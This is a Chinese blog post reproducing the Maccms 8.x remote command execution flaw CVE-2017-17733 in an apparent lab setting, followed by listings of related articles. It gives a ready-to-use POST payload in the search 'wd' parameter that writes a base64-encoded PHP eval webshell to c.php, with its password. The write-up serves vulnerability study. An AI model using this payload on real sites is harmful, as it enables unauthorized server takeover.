maccms 远程命令执行(CVE-2017-17733)复现

最新推荐文章于 2024-02-26 16:18:27 发布
最新推荐文章于 2024-02-26 16:18:27 发布
阅读量850 收藏
点赞数 1
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127578933
版权

一、漏洞简介

魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。

二、漏洞影响

Maccms8.x

三、漏洞复现

1、访问特定URLhttp://ip:port/index.php?m=vod-search

2、开启抓包

修改一:

改为POST请求

修改二:

添加POST提交的数据 上传一句话木马

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

3、 访问页面测试是否上传成功 c.php密码c

4、链接后门获取flag

恸.283
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 3099
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
vulfocus——maccms远程命令执行(CVE-2017-17733
m0_62063669的博客
09-12 1361
Maccms 8.x版本中存在安全漏洞远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。利用浏览器浏览器发送POST数据包或直接使用Python编写的脚本进行发送POST数据包。3.进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。Maccms是一套跨平台的基于PHP和MySQL快速建站系统。
maccms 远程命令执行CVE-2017-17733
weixin_42675091的博客
09-23 860
maccms 远程命令执行CVE-2017-17733
maccms-cve_2017_17733漏洞复现
qq_51459600的博客
03-02 3961
maccms-cve_2017_17733 Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。 环境搭建 靶机:CentOS7(192.168.2.110) 利用本地vulfocus平台一键搭建maccms环境: 环境搭建完成 漏洞利用 访问http://192.168.2.110:59973/index.php?m=vod-search post提
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 368
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
漏洞复现】六、maccms 远程命令执行CVE-2017-17733
weixin_52351575的博客
09-21 557
这个马子进行了编码绕过,通过base64编码写入一句话木马
maccms10-mytheme-21
03-20
【描述】"maccms10-mytheme-21"描述简洁,可能意味着它是Maccms v10的一个定制化主题版本,编号为21,可能代表了开发者或设计团队内部的版本迭代。通常,这样的主题会包含HTML、CSS、JavaScript以及PHP代码,用于...
maccms10-mytheme-18
03-18
【标题】"maccms10-mytheme-18" 是一个基于MacCMS系统的自定义主题版本,这个主题编号为18,可能是该系统中众多主题的其中一个。MacCMS是一款流行的PHP视频CMS(内容管理系统),它专为构建视频分享网站而设计。这款...
maccms10-mytheme-26
03-18
【描述】"maccms10-mytheme-26"描述中的关键词没有提供具体信息,但可以理解为这是一个针对MACCMS v10的定制化主题。通常,一个主题模板会包含HTML、CSS、JavaScript以及PHP文件,以改变网站的外观和用户体验,同时...
魅魔视频电影程序(MacCMS ASP) 6.1 20120511-ASP源码.zip
12-12
ASP源码,压缩包解压密码:www.cqlsoft.com
maccmsv10仿优酷模版最新修复bug完美版
03-22
maccmsv10仿优酷模版最新修复bug完美版,是小的我经过修改的完美版本,修复了部分图片显示不全的问题,放大了今日热点图片显示。留言框更加美观贴心! 演示站点:http://tsmp4.net
最新解密苹果MacCms播放器playerJS 去播放器广告 基于maccms8.x 2017.09.27
11-25
MacCms源文件里的player.js是加密的,加密的文件内置小广告比牛皮癣还多。 不但影响使用,且不方便修改,所以,有了解密文件,福音就来了。 下载后,在解密后的播放器文件里,自己把加密文件的外部链接换成自己的,就可以了。 代码不熟悉的,可以搜索在线JS转HTML代码工具,进行更直观的替换、修改。 基于发布日期:2017.09.27 再也不用为苹果CMS播放器代码加密问题头疼了。 好东西就是拿来分享的。 注意:文档只是把加密的东西,解密出来,广告链接并未删除,请自己换成自己的或删除吧 雨过天晴工作室制作发布 有任何需要请联系我
maccms10-master_maccms_maccms官网_maccms10_苹果_nan_
10-04
Maccms10-Master】是一个针对苹果设备和苹果官网的特定版本,它在苹果官网关闭后继续提供服务。这个版本已经更新到了2020年1月3日,这意味着它包含了截至那个日期的所有最新功能和修复。Maccms是内容管理系统(CMS...
苹果maccms V10播放器悬浮代码教程-已经测试过了
08-15
苹果cmsV10添加悬浮播放器添加后当用户下滑后就可以随页面下移, 具体方法如下: 找到你模板路径下的include.html文件,一般在模板目录的block或者... 有些模板则需要加入以下JS 请自测(JS文件请自行去DPlayer提取)
maccms10:苹果cms-v10,maccms-v10,麦克cms,开源cms,内容管理系统,视频分享程序,分集剧情程序,网址导航程序,文章程序,漫画程序,图片程序
03-11
苹果cms-v10 ...经过近多年的开发经验和技术积累,苹果CMS程序已逐渐走向成熟,在易用性和功能上已经成为同行程序小型->优化程序代码,运行速度快->高效的缓存处理,只要普通的虚拟主机就可以完美搭建起来,建站成本...
Maccms命令执行(CVE-2017-17733)
最新发布
m0_65150886的博客
02-26 372
远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.通过火狐浏览器访问http://ip:port/index.php?Maccms是一套跨平台的基于PHP和MySQL快速建站系统。1.访问http://ip:port,出现如下页面,开始实验。url地址:http://ip:port/c.phpMaccms 8.x版本中存在。3.蚁剑连接,getshell。
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
苹果maccms网站漏洞进行修复解决方法教程
weixin_46020146的博客
09-05 281
苹果maccms网站漏洞进行修复解决方法教程
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7047
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
maccms10 采集
07-28
根据引用\[1\]中提供的信息,maccms10可以使用以下采集接口进行影视资源的采集: - 百度云资源:https://api.apibdzy.com/api.php/provide/vod/?ac=list - U酷资源-百度云资源的子站:https://api.ukuapi.com/api.php/provide/vod/at/xml/ - 麒麟资源:https://www.qilinzyz.com/api.php/provide/vod/?ac=list - 番茄资源:http://api.fqzy.cc/api.php/provide/vod/?ac=list - 红牛资源:https://www.hongniuzy1.com/inc/api.php - 无尽资源:https://api.wujinapi.com/api.php/provide/vod/?ac=list - kuaibozy资源:http://www.kuaibozy.com/api.php/provide/vod/from/kbm3u8/at/xml/ - 8090资源:http://zy.yilans.net:8090/api.php/provide/vod/?ac=list 而根据引用\[2\]中提供的信息,maccms10可以使用以下播放解析接口解析播放地址和m3u8视频: - https://cdn.zyc888.top/?url= (可能有广告) - 番茄资源:https://jiexi.8b5q.cn/player/jx.php?url= 最后,根据引用\[3\]中的建议,操作成功后,需要对分类进行绑定,以确保采集的数据与自己网站的数据有关联。 #### 引用[.reference_title] - *1* *2* [分享一些自己在用的maccms10的免费采集接口](https://blog.csdn.net/muzihuaner/article/details/124395958)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [苹果cms v10影视网站数据采集](https://blog.csdn.net/glei20/article/details/119735319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值